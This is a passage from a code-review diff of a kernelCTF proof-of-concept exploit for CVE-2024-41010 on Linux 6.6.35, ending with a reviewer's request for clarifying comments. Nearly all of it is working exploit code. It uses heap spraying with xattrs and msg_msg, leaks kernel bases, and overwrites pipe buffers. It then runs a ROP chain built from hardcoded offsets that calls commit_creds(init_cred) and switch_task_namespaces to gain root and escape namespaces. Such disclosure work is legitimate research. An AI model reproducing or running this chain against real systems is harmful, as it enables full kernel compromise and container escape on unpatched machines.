pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c

```diff
@@ -0,0 +1,871 @@
+
+	snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 1);
+	remove_xattr_noerror(file_name, attribute_name);
+	
+	for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++)
+	{
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 5);
+		remove_xattr_noerror(file_name, attribute_name);
+	}
+
+	spray_msgmsg_for_overwrite_pipe_buffer(0x300, 0x0, 0x0, 0x0);
+	
+	for(int i=0; i<0x1f8; i++)
+		activate_ops(pipes[i]);
+
+	uint64_t vmemmap_base = (read_msgmsg_for_leak_vmemmap_base(0x300) >> 28) << 28;
+	uint64_t kheap_base = (((((uint64_t)nodes[nodes_front].xattr.rb_node.rb_right - 0x6000000) >> 28) - 0x10) << 28);
+	uint64_t longjump_victim_address = kbase + 0x2c51a40;
+
+	printf("[*] page_offset_base: 0x%llx\n", kheap_base);
+	printf("[*] vmemmap base: 0x%llx\n", vmemmap_base);
+	printf("[*] longjump victim address: 0x%llx\n", longjump_victim_address);
+	if(vmemmap_base == 0)
+	{
+		printf("[-] fail on get vmemmap_base, cleanup it");
+		cleanup();
+		return -1;
+	}
+
+	uint64_t wakeup_long64 = kbase + 0x12c291;
+
+	printf("[*] spray msg_msg again\n");
+	spray_msgmsg_for_overwrite_pipe_buffer(0x300,
+		virt2page(longjump_victim_address & (~0xfff), kheap_base, vmemmap_base), 
+		nodes[nodes_front].xattr.name, wakeup_long64
+	);
+
+	uint64_t init_cred = kbase + 0x2c72d60;
+	uint64_t commit_cred = kbase + 0x001f5520;
+	uint64_t prepare_kernel_cred = kbase + 0x001f57d0;
+	uint64_t ret_from_fork = kbase + 0x10d430;
+	uint64_t msleep = kbase + 0x271300;
+
+	uint64_t find_task_by_vpid = kbase + 0x1e8d60;
+	uint64_t switch_task_namespaces = kbase + 0x1f31c0;
+	uint64_t set_memory_x = kbase + 0x001551f0;
+
+	uint64_t init_nsproxy = kbase + 0x2c72880;
+
+	uint64_t ret = kbase + 0x5a1;
+
+	// wakeup_long64 
+	uint64_t longjump[] = {
+		0x0, // rbp
+		0x1, // rsi
+		longjump_victim_address & (~0xfff), // rdi
+		0x0, // rbx
+		ret, // rip -> ret
+		longjump_victim_address + 0x8*6, // rsp -> stack pivot to longjump victim address
+		
+		set_memory_x, 
+
+		longjump_victim_address + 0x8*0x18, // pop rdi; ret;
+		init_cred,
+		commit_cred, // commit_cred(init_cred);
+
+		longjump_victim_address + 0x8*0x18, // pop rdi; ret;
+		1,
+		find_task_by_vpid, // find_task_by_vpid(1)
+		
+		longjump_victim_address + 0x8*0x1a, // mov rdi, rax; ret;
+
+		longjump_victim_address + 0x8*0x19, // pop rsi; ret;
+		init_nsproxy,
+		switch_task_namespaces, // switch_task_namespaces(task, init_nsproxy)
+
+		longjump_victim_address + 0x8*0x1b, // swapgs; iretq;
+		0x0,
+		sr->cs,
+		sr->rflags,
+		sr->rsp,
+		sr->ss, 
+		0x0, // 23
+
+		0xc35f, // pop rdi; ret -> idx: 0x18
+		0xc35e, // pop rsi; ret
+		0xc3c78948, // mov rdi, rax; ret
+		0xcf48f8010f, // swapgs; iretq;
+	};
+
+	printf("[+] target: 0x%llx\n", nodes[nodes_front].xattr.name);
+
+	for(int i=0; i<0x1f8; i++)
+		write_pipe(pipes[i], ((char *)&longjump - (longjump_victim_address&0xfff)), 
```

Comment:
Mention in a comment that because we have to write the whole page, and we cannot just write the `longjump_victim_address`, that's why this calculation is happening. Also it may worth mentioning that you are writing random, somewhat uncontrolled memory from your exploit's stack (the memory before `longjump` until the beginning of the page) to the kernel and why it does not cause any issues or crashes.